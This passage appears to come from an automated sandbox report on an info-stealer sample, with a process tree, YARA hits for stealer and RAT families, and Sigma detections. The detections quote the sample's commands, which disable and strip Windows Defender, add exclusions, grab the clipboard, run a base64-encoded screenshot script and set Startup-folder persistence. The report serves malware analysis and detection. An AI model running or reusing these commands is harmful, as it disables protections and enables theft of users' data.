QBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
                • cmd.exe (PID: 8688 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tree.com (PID: 8804 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
                • cmd.exe (PID: 8860 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tree.com (PID: 8980 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
                  • Conhost.exe (PID: 2164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • cmd.exe (PID: 9020 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 9044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • getmac.exe (PID: 9084 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
                • cmd.exe (PID: 6324 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 8352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • tree.com (PID: 8432 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
                • Conhost.exe (PID: 5892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • Conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7564 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WmiPrvSE.exe (PID: 7876 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DynamicStealerDynamic Stealer is a Github Project C# written code by L1ghtN4n. This code collects passwords and uploads these to Telegram. According to Cyble this Eternity Stealer leverages code from this project and also Jester Stealer could be rebranded from it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dynamicstealer

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI14722\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    C:\ProgramData\main.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
      C:\ProgramData\main.exeJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
        C:\ProgramData\main.exeJoeSecurity_MillenuimRATYara detected Millenuim RATJoe Security
          C:\ProgramData\main.exeJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 6 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GenericPythonStealerYara detected Generic Python StealerJoe Security
              00000009.00000003.2218654025.0000020102CE3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CStealerYara detected CStealerJoe Security
                00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GenericPythonStealerYara detected Generic Python StealerJoe Security
                  00000009.00000003.2280639177.0000020102D0C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CStealerYara detected CStealerJoe Security
                    00000009.00000003.2208622315.0000020102CB6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CStealerYara detected CStealerJoe Security
                      Click to see the 51 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      46.0.main.exe.16132da05b8.2.raw.unpackJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
                        46.0.main.exe.16132da05b8.2.raw.unpackJoeSecurity_MillenuimRATYara detected Millenuim RATJoe Security
                          46.0.main.exe.16132da05b8.2.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                            46.0.main.exe.16132da05b8.2.raw.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                              46.0.main.exe.16132c3ef04.1.raw.unpackJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
                                Click to see the 7 entries

                                Sigma Signatures

                                System Summary

                                barindex
                                Sigma detected: Files With System Process Name In Unsuspected Locations
                                Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe, ProcessId: 6728, TargetFilename: C:\ProgramData\svchost.exe
                                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 4292, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'", ProcessId: 4128, ProcessName: cmd.exe
                                Sigma detected: Powershell Defender Disable Scan Feature
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 4292, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 5036, ProcessName: cmd.exe
                                Sigma detected: Suspicious Encoded PowerShell Command Line
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                Sigma detected: Suspicious PowerShell Encoded Command Patterns
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                Sigma detected: Suspicious Startup Folder Persistence
                                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Microsoft\based.exe, ProcessId: 4292, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr
                                Sigma detected: System File Execution Location Anomaly
                                Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\ProgramData\svchost.exe" , CommandLine: "C:\ProgramData\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\ProgramData\svchost.exe, NewProcessName: C:\ProgramData\svchost.exe, OriginalFileName: C:\ProgramData\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe -pbeznogym, ParentImage: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe, ParentProcessId: 6728, ParentProcessName: s.exe, ProcessCommandLine: "C:\ProgramData\svchost.exe" , ProcessId: 8076, ProcessName: svchost.exe
                                Sigma detected: Change PowerShell Policies to an Insecure Level
                                Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                                Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
                                Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\ProgramData\Microsoft\based.exe" , ParentImage: C:\ProgramData\Microsoft\based.exe, ParentProcessId: 4292, ParentProcessName: based.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7968, ProcessName: cmd.exe
                                Sigma detected: Powershell Defender Exclusion
